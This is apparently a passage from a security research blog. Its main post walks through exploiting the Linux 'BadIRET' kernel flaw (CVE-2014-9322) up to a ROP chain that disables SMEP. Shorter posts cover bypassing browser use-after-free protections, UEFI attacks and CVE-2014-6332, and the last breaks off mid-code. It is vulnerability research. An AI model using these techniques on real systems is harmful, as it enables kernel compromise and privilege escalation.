February 2, 2015 / Rafal Wojtczuk

Exploiting “BadIRET” vulnerability (CVE-2014-9322, Linux kernel privilege escalation)


CVE-2014-9322 is described as follows:

arch/x86/kernel/entry_64.S in the Linux kernel before 3.17.5 does not
properly handle faults associated with the Stack Segment (SS) segment
register, which allows local users to gain privileges by triggering an IRET
instruction that leads to access to a GS Base address from the wrong space. 

It was fixed on 23rd November 2014 with this commit.
I have seen neither a public exploit nor a detailed discussion about the issue. In this post I will try to explain the nature of the vulnerability and the exploitation steps as clearly as possible; unfortunately I cannot quote the full 3rd volume of Intel Software Developer’s Manuals, so if some terminology is unknown to the reader then details can be found there.
All experiments were conducted on a Fedora 20 system running a 64-bit 3.11.10-301 kernel; the whole discussion is 64-bit specific.

Short results summary:

  1. With the tested kernel, the vulnerability can be reliably exploited to achieve kernelmode
    arbitrary code execution.

  2. SMEP does not prevent arbitrary code execution; SMAP does prevent arbitrary code execution.

Digression: kernel, usermode, iret

The vulnerability

In a few cases, when the Linux kernel returns to usermode via iret, this instruction throws an exception. The exception handler returns execution to the bad_iret function, which does

     /* So pretend we completed the iret and took the #GPF in user mode.*/
     pushq $0
     jmp general_protection

As the comment explains, the subsequent code flow should be identical to the case when a general protection exception happens in user mode (just jump to the #GP handler). This works well for most of the exceptions that can be raised by iret, e.g. #GP.

The problematic case is the #SS exception. If a kernel is vulnerable (so, older than 3.17.5) and has “espfix” functionality (introduced around kernel version 3.16), then bad_iret executes with a read-only stack – the “push” instruction generates a page fault that gets converted into a double fault. I have not analysed this scenario; from now on, we focus on pre-3.16 kernels, with no “espfix”.

The vulnerability stems from the fact that the exception handler for the #SS exception does not fit the “pretend-it-was-#GP-in-userspace” schema well. Compared with e.g. the #GP handler, the #SS exception handler does one extra swapgs instruction. In case you are not familiar with swapgs semantics, read the digression below; otherwise skip it.

Digression: swapgs instruction

When memory is accessed with gs segment prefix, like this:

mov %gs:LOGICAL_ADDRESS, %eax

the following actually happens:

  1. BASE_ADDRESS value is retrieved from the hidden part of the segment register
  2. memory at linear address LOGICAL_ADDRESS+BASE_ADDRESS is dereferenced

The base address is initially derived from Global Descriptor Table (or LDT). However, there are situations where GS segment base is changed on the fly, without involving GDT.
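As a rough illustration of the two steps above, the following C sketch models a gs-prefixed load as an ordinary load from base plus offset. The names `gs_base` and `load_gs` are hypothetical; on real hardware the base lives in a hidden register, not in a variable.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical stand-in for the hidden GS base kept by the CPU. */
uintptr_t gs_base;

/* Models "mov %gs:offset, %eax": a 32-bit load from gs_base + offset. */
uint32_t load_gs(uintptr_t offset)
{
    uint32_t value;

    assert(gs_base != 0); /* the model needs a base to have been set */
    memcpy(&value, (const void *)(gs_base + offset), sizeof value);
    return value;
}
```

Whoever controls `gs_base` decides which memory every such access actually touches, which is the property the rest of the post relies on.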

Quoting SDM:
“SWAPGS exchanges the current GS base register value with the value contained in MSR address C0000102H (IA32_KERNEL_GS_BASE). The SWAPGS instruction is a privileged instruction intended for use by system software. (…) The kernel can then use the GS prefix on normal memory references to access [per-cpu] kernel data structures.”
For each CPU, Linux kernel allocates at boot time a fixed-size structure holding crucial data. Then, for each CPU, Linux loads IA32_KERNEL_GS_BASE with this structure address. Therefore, the usual pattern of e.g. syscall handler is:

  1. swapgs (now the gs base points to kernel memory)
  2. access per-cpu kernel data structures via memory instructions with gs prefix
  3. swapgs (it undoes the result of the previous swapgs, gs base points to usermode memory)
  4. return to usermode

Naturally, kernel code must ensure that whenever it wants to access per-cpu data with gs prefix, the number of swapgs instructions executed by the kernel since entry from usermode is odd (so that gs base points to kernel memory).
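The parity rule can be made concrete with a small model. This is only a sketch: `struct cpu_model` and its field names are hypothetical, and the addresses used with it are arbitrary example values.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical model of one CPU: the active GS base and the value held in
 * the IA32_KERNEL_GS_BASE MSR. */
struct cpu_model {
    uint64_t gs_base;
    uint64_t kernel_gs_base_msr;
};

/* Models swapgs: exchange the active GS base with the MSR value. */
void swapgs(struct cpu_model *cpu)
{
    uint64_t tmp = cpu->gs_base;

    cpu->gs_base = cpu->kernel_gs_base_msr;
    cpu->kernel_gs_base_msr = tmp;
}

/* Returns 1 when the active GS base is the kernel per-cpu area. */
int gs_points_to_kernel(const struct cpu_model *cpu, uint64_t percpu_area)
{
    assert(cpu != NULL);
    return cpu->gs_base == percpu_area;
}
```

Starting from usermode state, one call to `swapgs` makes `gs_points_to_kernel` true and a second call makes it false again, so a single unexpected extra swapgs leaves the kernel running on the user-chosen base.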

Triggering the vulnerability

By now it should be obvious that the vulnerability is grave – because of one extra swapgs in the vulnerable code path, kernel will try to access important data structures with a wrong gs base, controllable by the user.
When is #SS exception thrown by the iret instruction? Interestingly, the Intel SDM is incomplete in this aspect; in the description of iret instruction, it says:

 64-Bit Mode Exceptions:
 If an attempt to pop a value off the stack violates the SS limit.
 If an attempt to pop a value off the stack causes a non-canonical address
 to be referenced.

None of these conditions can be forced to happen in kernel mode. However, the pseudocode for iret (in the same SDM) shows another case: when the segment defined by the return frame is not present:

IF stack segment is not present
THEN #SS(SS selector); FI;

So, in usermode, we need to set the ss register to something not present. It is not straightforward: we cannot just use

mov $nonpresent_segment_selector, %eax
mov %ax, %ss

as the latter instruction will generate #GP. Setting ss via a debugger/ptrace is disallowed; similarly, the sys_sigreturn syscall does not set this register on 64-bit systems (it might work on 32-bit, though). The solution is:

  1. thread A: create a custom segment X in LDT via sys_modify_ldt syscall
  2. thread B: ss:=X_selector
  3. thread A: invalidate X via sys_modify_ldt
  4. thread B: wait for hardware interrupt

The reason why one needs two threads (both in the same process) is that the return from a syscall (including sys_modify_ldt) is done via the sysret instruction, which hardcodes the ss value. If we invalidated X in the same thread that did “ss:=X”, the ss assignment would be undone.
Running the above code results in kernel panic. In order to do something more meaningful, we will need to control usermode gs base; it can be set via arch_prctl(ARCH_SET_GS) syscall.

Achieving write primitive

If we run the above code, then the #SS handler runs fine (meaning: it will not touch memory at gs base) and returns into bad_iret, which in turn jumps to the #GP exception handler. This runs fine for a while, and then calls the following function:

289 dotraplinkage void
290 do_general_protection(struct pt_regs *regs, long error_code)
291 {
292         struct task_struct *tsk;
306         tsk = current;
307         if (!user_mode(regs)) {
                ... it is not reached
317         }
319         tsk->thread.error_code = error_code;
320         tsk->thread.trap_nr = X86_TRAP_GP;
322         if (show_unhandled_signals && unhandled_signal(tsk, SIGSEGV) &&
323                         printk_ratelimit()) {
324                 pr_info("%s[%d] general protection ip:%lx sp:%lx error:%lx",
325                         tsk->comm, task_pid_nr(tsk),
326                         regs->ip, regs->sp, error_code);
327                 print_vma_addr(" in ", regs->ip);
328                 pr_cont("\n");
329         }
331         force_sig_info(SIGSEGV, SEND_SIG_PRIV, tsk);
332 exit:
333         exception_exit(prev_state);
334 }

It is far from obvious from the C code, but the assignment to tsk from the current macro uses a memory read with gs prefix. Line 306 is actually:

0xffffffff8164b79d:	mov    %gs:0xc780,%rbx

This gets interesting. We control the “current” pointer, which points to the giant data structure describing the whole Linux process. In particular, the lines

319         tsk->thread.error_code = error_code;
320         tsk->thread.trap_nr = X86_TRAP_GP;

are writes to addresses (at some fixed offset from the beginning of the task struct) that we control. Note that the values being written are not controllable (they are the constants 0 and 0xd, respectively), but this should not be a problem. Game over?

Not quite. Say, we want to overwrite some important kernel data structure at X. If we do the following steps:

  1. prepare usermode memory at FAKE_PERCPU, and set gs base to it
  2. Make the location FAKE_PERCPU+0xc780 hold the pointer FAKE_CURRENT_WITH_OFFSET, such that FAKE_CURRENT_WITH_OFFSET= X – offsetof(struct task_struct, thread.error_code)
  3. trigger the vulnerability

Then indeed do_general_protection will write to X. But soon afterwards it will try to access other fields in the current task_struct again; e.g. the unhandled_signal() function dereferences a pointer from task_struct. We have no control over what lies beyond X, and the result will be a page fault in the kernel.
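The pointer arithmetic in step 2 can be sketched in C as follows. The structures here are hypothetical and drastically simplified; the real task_struct is far larger and its offsets depend on the exact kernel build.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical, heavily simplified layouts (not the real kernel ones). */
struct thread_model {
    unsigned long sp;
    unsigned long error_code;
    unsigned long trap_nr;
};

struct task_model {
    long state;
    void *stack;
    struct thread_model thread;
};

/* Value to place in the fake per-cpu area (at offset 0xc780 on the tested
 * kernel) so that the store to tsk->thread.error_code lands exactly on x. */
uintptr_t fake_current_for(uintptr_t x)
{
    size_t off = offsetof(struct task_model, thread.error_code);

    assert(x >= off); /* the subtraction must not wrap around */
    return x - off;
}
```

Any other field the kernel reads through the same pointer is then found at its usual offset relative to `x`, which is exactly why memory around the target matters.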
How can we cope with this? Options:

  1. Do nothing. Linux kernel, unlike e.g. Windows, is quite permissive when it gets an unexpected page fault in kernel mode – if possible, it kills the current process, and tries to continue (while Windows bluescreens immediately).
    This does not work – the result is massive kernel data corruption and whole system freeze. My suspicion is that after the current process is killed, the swapgs imbalance persists, resulting in many unexpected page faults in the context of the other processes.

  2. Use the “tsk->thread.error_code = error_code” write to overwrite IDT entry for the page fault handler. Then the page fault (triggered by, say, unhandled_signal()) will result in running our code. This technique proved to be successful on a couple of occasions before.
    This does not work, either, for two reasons:

    • Linux makes IDT read-only (bravo!)
    • even if the IDT were writeable, we do not control the overwrite value – it is 0 or 0xd. If we overwrite the top DWORDs of the IDT entry for #PF, the resulting address will be in usermode, and SMEP will prevent handler execution (more on SMEP later). We could nullify the lowest one or two bytes of the legal handler address, but the chances of either resulting address being a useful stack pivot sequence are negligible.
  3. We can try a race. Say, the “tsk->thread.error_code = error_code” write facilitates code execution, e.g. allows us to control a code pointer P that is called via SOME_SYSCALL. Then we can trigger our vulnerability on CPU 0, and at the same time CPU 1 can run SOME_SYSCALL in a loop. The idea is that we will get code execution via CPU 1 before damage is done on CPU 0, and e.g. hook the page fault handler, so that CPU 0 can do no more harm.
    I tried this approach a couple of times, with no luck; perhaps with a different vulnerability the timings would be different and it would work better.

  4. Throw in the towel on the “tsk->thread.error_code = error_code” write.

With some disgust, we will follow the last option. We will point “current” to a usermode location, setting the pointers in it so that the read dereferences on them hit our (controlled) memory. Naturally, we inspect the subsequent code to find more pointer write dereferences.

Achieving write primitive continued, aka life after do_general_protection

Our next chance is the function called by do_general_protection():

int force_sig_info(int sig, struct siginfo *info, struct task_struct *t)
{
        unsigned long int flags;
        int ret, blocked, ignored;
        struct k_sigaction *action;

        spin_lock_irqsave(&t->sighand->siglock, flags);
        action = &t->sighand->action[sig-1];
        ignored = action->sa.sa_handler == SIG_IGN;
        blocked = sigismember(&t->blocked, sig);
        if (blocked || ignored) {
                action->sa.sa_handler = SIG_DFL;
                if (blocked) {
                        sigdelset(&t->blocked, sig);
                }
        }
        if (action->sa.sa_handler == SIG_DFL)
                t->signal->flags &= ~SIGNAL_UNKILLABLE;
        ret = specific_send_sig_info(sig, info, t);
        spin_unlock_irqrestore(&t->sighand->siglock, flags);

        return ret;
}

The field “sighand” in task_struct is a pointer, that we can set to an arbitrary value. It means that the

action = &t->sighand->action[sig-1];
action->sa.sa_handler = SIG_DFL;

lines are another chance for a write primitive to an arbitrary location. Again, we do not control the write value – it is the constant SIG_DFL, equal to 0.
This finally works, hurray! With a little twist, though. Assume we want to overwrite location X in the kernel. We prepare our fake task_struct (particularly the sighand field in it) so that X = address of t->sighand->action[sig-1].sa.sa_handler. But a few lines above, there is a line

spin_lock_irqsave(&t->sighand->siglock, flags);

As t->sighand->siglock is at a constant offset from t->sighand->action[sig-1].sa.sa_handler, the kernel will call spin_lock_irqsave on some address located after X, say at X+SPINLOCK, whose content we do not control. What happens then?
There are two possibilities:

  1. memory at X+SPINLOCK looks like an unlocked spinlock. spin_lock_irqsave will complete immediately. Final spin_unlock_irqrestore will undo the writes done by spin_lock_irqsave. Good.
  2. memory at X+SPINLOCK looks like a locked spinlock. spin_lock_irqsave will loop waiting for the spinlock – infinitely, if we do not react.
    This is worrying. In order to bypass this, we will need another assumption – we will need to know we are in this situation, meaning we will need to know the contents of memory at X+SPINLOCK. This is acceptable – we will see later that we will set X to be in kernel .data section. We will do the following:

    • initially, prepare FAKE_CURRENT so that t->sighand->siglock points to a locked spinlock in usermode, at SPINLOCK_USERMODE
    • force_sig_info() will hang in spin_lock_irqsave
    • at this moment, another usermode thread running on another CPU will change t->sighand, so that t->sighand->action[sig-1].sa.sa_handler is our overwrite target, and then unlock SPINLOCK_USERMODE
    • spin_lock_irqsave will return.
    • force_sig_info() will reload t->sighand, and perform the desired write.

A careful reader is encouraged to enquire why we cannot use the latter approach in the case where X+SPINLOCK is initially unlocked.
This is not all yet – we will need to prepare a few more fields in FAKE_CURRENT so that as little code as possible is executed. I will spare you the details – this blog is way too long already. The bottom line is that it works. What happens next? force_sig_info() returns, and do_general_protection() returns. The subsequent iret will throw #SS again (because the usermode ss value on the stack still refers to a nonpresent segment). But this time, the extra swapgs instruction in the #SS handler will return the balance to the Force, cancelling the effect of the previous incorrect swapgs. do_general_protection() will be invoked and operate on the real task_struct, not FAKE_CURRENT. Finally, the current task will be sent SIGSEGV, and another process will be scheduled for execution. The system remains stable.


Digression: SMEP

SMEP is a feature of Intel processors, starting with the 3rd generation of Core processors. If the SMEP bit is set in CR4, the CPU will refuse to execute code with kernel privileges if the code resides in usermode pages. Linux enables SMEP by default if available.

Achieving code execution

The previous paragraphs showed a way to overwrite 8 consecutive bytes in kernel memory with 0. How to turn this into code execution, assuming SMEP is enabled?
Overwriting a kernel code pointer would not work. We could nullify its top bytes, but then the resulting address would be in usermode, and SMEP would prevent dereference of this pointer. Alternatively, we could nullify a few low bytes, but then the chances that the resulting pointer would point to a useful stack pivot sequence are low.
What we need is a kernel pointer P to structure X, that contains code pointers. We can overwrite the top bytes of P so that the resulting address is in usermode, and the P->code_pointer_in_x() call will jump to a location that we can choose.
I am not sure what the best object to attack is. For my experiments, I chose the kernel proc_root variable. It is a structure of type

struct proc_dir_entry {
        const struct inode_operations *proc_iops;
        const struct file_operations *proc_fops;
        struct proc_dir_entry *next, *parent, *subdir;
        u8 namelen;
        char name[];
};

This structure represents an entry in the proc filesystem (and proc_root represents the root of the /proc filesystem). When a filename path starting with /proc is looked up, the “subdir” pointers (starting with proc_root.subdir) are followed, until the matching name is found. Afterwards, pointers from proc_iops are called:

struct inode_operations {
        struct dentry * (*lookup) (struct inode *,struct dentry *, unsigned int);
        void * (*follow_link) (struct dentry *, struct nameidata *);
        ...many more...
        int (*update_time)(struct inode *, struct timespec *, int);
} ____cacheline_aligned;

proc_root resides in the kernel data section. It means that the exploit needs to know its address. This information is available from /proc/kallsyms; however, many hardened kernels do not allow unprivileged users to read from this pseudofile. Still, if the kernel is a known build (say, shipped with a distribution), this address can be obtained offline; along with tens of offsets required to build FAKE_CURRENT.
So, we will overwrite proc_root.subdir so that it becomes a pointer to a controlled struct proc_dir_entry residing in usermode. A slight complication is that we cannot overwrite the whole pointer. Remember, our write primitive is “overwrite with 8 zeroes”. If we made proc_root.subdir be 0, we would not be able to map it, because Linux does not allow usermode to map address 0 (more precisely, any address below /proc/sys/vm/mmap_min_addr, but the latter is 4k by default). It means we need to:

  1. map 16MB of memory at address 4096
  2. fill it with a pattern resembling proc_dir_entry, with the inode_operations field pointing to usermode address FAKE_IOPS, and name field being “A” string.
  3. configure the exploit to overwrite the top 5 bytes of proc_root.subdir

Then, unless the bottom 3 bytes of proc_root.subdir are 0, we can be sure that after triggering the overwrite in force_sig_info(), proc_root.subdir will point to controlled usermode memory. When our process calls open(“/proc/A”, …), pointers from FAKE_IOPS will be called. What should they point to?
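To see why aiming the 8-byte zero write three bytes into the pointer leaves an address below 16MB, consider the following sketch. It assumes a little-endian machine (as x86-64 is); `struct two_fields` is a hypothetical stand-in for the subdir pointer and whatever 8 bytes follow it in memory.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical stand-in for two adjacent 8-byte fields in kernel memory. */
struct two_fields {
    uint64_t subdir;
    uint64_t following;
};

/* Models the write primitive: 8 zero bytes stored at a chosen address. */
void write_8_zeroes(void *target)
{
    assert(target != NULL);
    memset(target, 0, 8);
}

/* Aims the primitive 3 bytes into subdir: on a little-endian machine the
 * top 5 bytes of subdir are cleared and its low 3 bytes survive. */
uint64_t clobber_subdir(struct two_fields *f)
{
    write_8_zeroes((unsigned char *)&f->subdir + 3);
    return f->subdir;
}
```

With an example value of 0xffff880012345678 the result is 0x345678, which lies inside the 16MB mapping. In this model the remaining three zero bytes spill into the low bytes of the following field, so an exploit would presumably have to tolerate that side effect.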
If you think the answer is “to our shellcode”, go back and read again.

We will need to point FAKE_IOPS pointers to a stack pivot sequence. This again assumes knowledge of the precise version of the running kernel. The usual “xchg %esp, %eax; ret” code sequence (it is two bytes only, 94 c3, found at 0xffffffff8119f1ed in case of the tested kernel) works very well for 64-bit kernel ROP. Even if there is no control over %rax, this xchg instruction operates on 32-bit registers, thus clearing the high 32 bits of %rsp and landing %rsp in usermode memory. In the worst case, we may need to allocate the low 4GB of virtual memory and fill it with a ROP chain.
In the case of the tested kernel, two different ways to dereference pointers in FAKE_IOPS were observed:

  1. %rax:=FAKE_IOPS; call *SOME_OFFSET(%rax)
  2. %rax:=FAKE_IOPS; %rax:=SOME_OFFSET(%rax); call *%rax

In the first case, after %rsp is exchanged with %rax, it will be equal to FAKE_IOPS. We need the ROP chain to reside at the beginning of FAKE_IOPS, so it needs to start with something like “add $A_LOT, %rsp; ret”, and continue after the end of the FAKE_IOPS pointers.
In the second case, %rsp will be assigned the low 32 bits of the call target, so 0x8119f1ed. We need to prepare the ROP chain at this address as well.
To sum up, as %rax has one of two known values at the moment of entry to the stack pivot sequence, we do not need to fill the whole 4GB with a ROP chain, just the above two addresses.
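The effect of the pivot on the stack pointer can be modelled in one line of C. This is only a sketch of the zero-extension rule for 32-bit register writes in 64-bit mode; `rsp_after_pivot` is a hypothetical helper name.

```c
#include <assert.h>
#include <stdint.h>

/* Models what "xchg %esp, %eax" does to %rsp in 64-bit mode: a write to a
 * 32-bit register zero-extends, so %rsp becomes the low 32 bits of %rax. */
uint64_t rsp_after_pivot(uint64_t rax)
{
    uint64_t rsp = (uint32_t)rax;

    assert((rsp >> 32) == 0); /* always below 4GB, hence a usermode address */
    return rsp;
}
```

For the second case above, `rsp_after_pivot(0xffffffff8119f1ed)` yields 0x8119f1ed, the address where the chain has to be placed.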
The ROP chain itself is straightforward, shown for the second case:

unsigned long *stack=(unsigned long *)0x8119f1ed;
*stack++=0xffffffff81307bcdULL;  // pop %rdi; ret
*stack++=0x407e0;                // cr4 value with the SMEP bit cleared
*stack++=0xffffffff8104c394ULL;  // mov %rdi, %cr4; pop %rbp; ret
*stack++=0xaabbccdd;             // placeholder for rbp


Digression: SMAP

SMAP is a feature of Intel processors, starting with the 5th generation of Core processors. If the SMAP bit is set in CR4, the CPU will refuse to access memory with kernel privileges if this memory resides in usermode pages. Linux enables SMAP by default if available. A test kernel module (run on a system with a Core-M 5Y10a CPU) that tries to access usermode crashes with:

[  314.099024] running with cr4=0x3407e0
[  389.885318] BUG: unable to handle kernel paging request at 00007f9d87670000
[  389.885455] IP: [ffffffffa0832029] test_write_proc+0x29/0x50 [smaptest]
[  389.885577] PGD 427cf067 PUD 42b22067 PMD 41ef3067 PTE 80000000408f9867
[  389.887253] Code: 48 8b 33 48 c7 c7 3f 30 83 a0 31 c0 e8 21 c1 f0 e0 44 89 e0 48 8b 

As we can see, although the usermode page is present, access to it throws a page fault.
Windows systems do not seem to support SMAP; Windows 10 Technical Preview build 9926 runs with cr4=0x1506f8 (SMEP set, SMAP unset); in comparison with Linux (which was tested on the same hardware) you can see that bit 21 in cr4 is not set. This is not surprising; in the case of Linux, access to usermode is performed explicitly, via copy_from_user, copy_to_user and similar functions, so it is doable to turn off SMAP temporarily for the duration of these functions. On Windows, kernel code accesses usermode directly, just wrapping the access in an exception handler, so it is more difficult to adjust all the drivers in all required places to work properly with SMAP.
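The CR4 values quoted in this post can be decoded with a few bit tests. The sketch below uses the architectural bit positions (SMEP is bit 20, SMAP is bit 21); the helper names are hypothetical, and 0x1407e0 as the pre-ROP value is an assumption inferred from the 0x407e0 constant in the chain.

```c
#include <assert.h>
#include <stdint.h>

#define CR4_SMEP (UINT64_C(1) << 20) /* Supervisor Mode Execution Prevention */
#define CR4_SMAP (UINT64_C(1) << 21) /* Supervisor Mode Access Prevention */

int cr4_has_smep(uint64_t cr4) { return (cr4 & CR4_SMEP) != 0; }
int cr4_has_smap(uint64_t cr4) { return (cr4 & CR4_SMAP) != 0; }

/* Computes the value a ROP chain would load into CR4 to turn SMEP off. */
uint64_t cr4_clear_smep(uint64_t cr4)
{
    assert(cr4_has_smep(cr4)); /* only meaningful if SMEP was on */
    return cr4 & ~CR4_SMEP;
}
```

Under these definitions 0x3407e0 (Linux on the Core-M) has both bits set, 0x1506f8 (the Windows preview) has SMEP only, and clearing SMEP in 0x1407e0 gives the 0x407e0 constant used in the chain.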

SMAP to the rescue!

The above exploitation method relied on preparing certain data structures in usermode and forcing the kernel to interpret them as trusted kernel data. This approach will not work with SMAP enabled – CPU will refuse to read malicious data from usermode.
What we could do is to craft all the required data structures, and then copy them to the kernel. For instance if one does

write(pipe_filedescriptor, evil_data, ...

then evil_data will be copied to a kernel pipe buffer. We would need to guess its address; some sort of heap spraying, combined with the fact that there is no spoon^W effective kernel ASLR, could work, although it is likely to be less reliable than exploitation without SMAP.
However, there is one more hurdle – remember, we need to set usermode gs base to point to our exploit data structures. In the scenario above (without SMAP), we used arch_prctl(ARCH_SET_GS) syscall, that is implemented in the following way in the kernel:

long do_arch_prctl(struct task_struct *task, int code, unsigned long addr)
{
         int ret = 0;
         int doit = task == current;
         int cpu;

         switch (code) {
         case ARCH_SET_GS:
                 if (addr >= TASK_SIZE_OF(task))
                         return -EPERM;
                 ... honour the request otherwise
         }
}

Houston, we have a problem – we cannot use this API to set gs base above the end of usermode memory!
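The range check can be modelled in isolation. In this sketch `TASK_SIZE_MODEL` is an assumed user address-space limit for a 64-bit task on x86-64 with 4-level paging, and `check_set_gs` is a hypothetical helper that mirrors only the comparison quoted above.

```c
#include <assert.h>
#include <errno.h>
#include <stdint.h>

/* Assumed limit: (1 << 47) minus one 4k page. */
#define TASK_SIZE_MODEL ((UINT64_C(1) << 47) - 4096)

static_assert(TASK_SIZE_MODEL == UINT64_C(0x00007ffffffff000),
              "limit sits just below the non-canonical hole");

/* Returns 0 if the requested gs base would be accepted, -EPERM otherwise. */
int check_set_gs(uint64_t addr)
{
    if (addr >= TASK_SIZE_MODEL)
        return -EPERM;
    return 0;
}
```

Any address in the kernel half of the address space, such as one inside a pipe buffer, fails this check, which is what blocks the SMAP-aware variant of the attack.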
Recent CPUs feature the wrgsbase instruction, which sets the gs base directly. This is a nonprivileged instruction, but it needs to be enabled by the kernel by setting the FSGSBASE bit (bit 16) in CR4. Linux does not set this bit, and therefore usermode cannot use this instruction.

In 64-bit mode, nonsystem entries in GDT and LDT are still 8 bytes long, and the base field is at most 4G-1 – so, no chance to set up a segment with a base address in kernel space.
So, unless I missed another way to set usermode gs base in the kernel range, SMAP protects 64bit Linux against achieving arbitrary code execution via exploiting CVE-2014-9322.

January 17, 2015 / Jared DeMott

Use-after-Free: New Protections, and how to Defeat them

The Problem

Memory corruption has plagued computers for decades, and these bugs can often be transformed into working cyber-attacks. Memory corruption is a situation where an attacker (malicious user of an application or network protocol) is able to send some data that is improperly processed by the native computer code. That can lead to important control structure changes that allow the attacker unexpected influence over the path a program will travel.

High-level protections, such as anti-virus (AV), have done little to stop the tide. That is because AV is poor at reacting to threats if they do not exist in their list of known attacks. Recent low-level operating system (OS) protections have helped. Non-executable memory and code module randomization help prevent attackers from leveraging memory corruption bugs, by stopping injected code from successfully executing.

Yet a new memory corruption exploit variant called return-oriented programming (ROP) has survived these defenses. ROP operates by leveraging existing code in memory to undo non-executable memory protections. New medium-level defenses, such as Microsoft’s anti-ROP add-on called EMET, have helped some. But a particularly troublesome bug known as Use-after-Free (UaF) has been applied in conjunction with other techniques to bypass EMET (See Prior Blog HERE). UaFs have been the basis of many current cyber attacks including Operation SnowMan (CVE-2014-0322) and Operation Clandestine Fox (CVE-2014-1776). Thus, it is clear that further low-level mitigations are required.

The Solution

To address the problem of UaF attacks, browser vendors have implemented new protections within the browser process. A UaF happens when (1) a low-level data structure (called an object in C++) is released prematurely, (2) an attacker knows about this release and quickly fills that space with data they control, and (3) a dangling reference to the original object, which another part of the program assumes is still valid, is used. By that point, of course, the attacker has changed the object’s data without the program noticing. The intruder can now leverage the influence afforded by the corrupted memory state to hijack the compromised program.

Microsoft chose to tackle this serious UaF problem with two new protections. These protections work together to stop attackers from being able to allocate new data in the spot where a dangling reference points. They call the new protections Heap Isolation and Delayed Free. The premise of these protections is simple. Heap Isolation creates a new heap. A heap is a place that a program uses to create/free internal data as needed throughout execution. This new isolated heap houses many internal Internet Explorer objects, while objects likely to be under the influence of attackers (like strings created via JavaScript) are still allocated on the typical default heap. Thus, if a UaF condition appears, the attacker should not be able to replace the memory of the dangling pointer with malicious data. We could liken this situation to forcing naughty school kids to use a separate playground from the trusted kids. But who is naughty and who is good? An obvious weakness of this approach is that with the many different objects used in a complex program like a browser, it is difficult for developers to perfectly separate the two groups of objects.

So Microsoft also created a second clever protection. Delayed Free operates by not releasing an object’s memory right away. In our analogy, if we assume the goal of the naughty kid is to steal the place in line from a good kid that unexpectedly stepped out of line, we can think of this protection as the playground teacher watching that place in line for a while, before the slot is finally opened. Even though the program has asked the allocator to free a chunk of memory, the object is not freed, but is instead put on a list to be freed later, when the playground looks safer. That way even if an attacker knows of an object type on both heaps that could be used to replace the memory backing a dangling reference, they cannot, since the memory has not actually been freed yet. The memory will not be truly freed until the following conditions are met: there are no references to the object on the stack and there are at least 100,000 bytes waiting to be freed, or the per-thread call stack unwinds fully to its original starting point.
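The release condition just described can be written down as a small predicate. This is a hypothetical model for illustration only: the structure, field names and function are invented here, and only the 100,000-byte threshold comes from the text.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Threshold quoted in the text; everything else is a hypothetical model. */
#define PENDING_BYTES_THRESHOLD 100000

struct deferred_state {
    size_t pending_bytes;     /* bytes currently queued for freeing */
    bool stack_references;    /* does any stack slot still reference the object? */
    bool stack_fully_unwound; /* has the thread's call stack returned to its start? */
};

/* True when a queued object may really be handed back to the allocator. */
bool may_release(const struct deferred_state *s)
{
    assert(s != NULL);
    if (s->stack_fully_unwound)
        return true;
    return !s->stack_references &&
           s->pending_bytes >= PENDING_BYTES_THRESHOLD;
}
```

Note that only stack references are consulted in this model, which mirrors the condition as described: a reference kept somewhere on the heap does not delay the release.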


Though the new protections are definitely helpful, and I even recommend applying them to other applications, no native mitigation is enough. If we look back at the history of memory corruption, we see that every time vendors put forth a new OS security measure, it worked in slowing attackers for a season, but before long each mitigation was bypassed by some clever new attack.

In my research, I show that one such bypass against these new protections involves using what I call a “long lived” dangling pointer. In my naughty child analogy, we can think of this as the sneaky and patient child that can go to either playground, and will wait for just the right moment before slipping ahead in line. In more technical terms, if an attacker can locate a UaF bug that involves code that maintains a heap reference to a dangling pointer, the conditions to actually free the object under the deferred free protection can be met (no stack references, or the call chain eventually unwinds). And finding useful objects in either playground to replace the original turns out not to be that difficult either. I wrote a Python script to search the core Internet Explorer code module (called MSHTML.dll). The script finds all the different objects and their sizes, and notes whether each is allocated to the default or the isolated heap. This information can be used to help locate useful objects to attack either heap. And with a memory garbage collection process known as coalescing, the replacement object does not even have to be the same size as the original object. This is useful for changing critical data (like the vtable pointer) at the proper offset in what was the original object. The Python code is HERE. For complete details on this research, please see the slides from my January 17th ShmooCon talk HERE.

January 6, 2015 / Rafal Wojtczuk

CCC31 talk about UEFI security

Recently, together with Corey Kallenberg, I gave a talk titled “Attacks on UEFI security” at the 31st Chaos Communication Congress. We described (and demoed) vulnerabilities allowing us to achieve write access to the flash chip (that stores UEFI code) and to SMM memory (that holds the code for the all-powerful System Management Mode). The CERT vulnerability notes are here, here and here; you are also encouraged to read the presentation, the whitepaper and the second whitepaper.
TL;DR-style, these vulnerabilities are useful for an attacker who already has administrative privileges in the operating system, and wants to install a UEFI-based or SMM-based rootkit. So no, the sky is not falling, and this type of attack is not seen often in the wild. Yet some well-known cases exist, and as the topic has gained quite some attention recently, there might be more in the future.

December 4, 2014 / Mantej Singh Rajpal

CVE-2014-6332: Life is all Rainbows and Unicorns

Though just patched earlier this month, the CVE-2014-6332 vulnerability shares its age with Yahoo, Neopets, and the hit TV show, Friends. This Windows vulnerability, also known as the “Unicorn” bug, has been exploited in the wild with the help of a Visual Basic Script. It impacts almost every version of Microsoft Windows from Windows 95 onwards, and can be exploited in Internet Explorer versions 3 to 11, inclusive. This complex vulnerability gets its name from being extremely rare, somewhat like a unicorn. After all, it’s not every day you come across a unicorn galloping through your front yard.

A lot has already been said about this vulnerability. The bug is caused by the IE VBScript engine not handling array re-sizing properly. By abusing this, one can achieve remote code execution, bypassing protections such as DEP and ASLR. To explain the vulnerability in a nutshell – there exists a control flow such that if you request to re-size an array and an error occurs (e.g. OutOfMemoryError), the new size will be maintained (as opposed to being reset). After triggering the vulnerability, you will be able to access the out-of-bound elements of the array. The exploit then uses this vulnerability to perform type confusion. The original IBM Security Intelligence article describes the bug in great detail and a Trend Micro blog walks through the PoC.
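The resize flaw described above follows a familiar pattern, sketched here in C. This is a hypothetical model, not the actual VBScript or OLE code: `struct array_model` and both functions are invented for illustration, and the `simulate_oom` flag stands in for a real allocation failure.

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>

/* Hypothetical array descriptor; not the real runtime structure. */
struct array_model {
    size_t count; /* number of elements the runtime believes exist */
    int *data;    /* backing storage */
};

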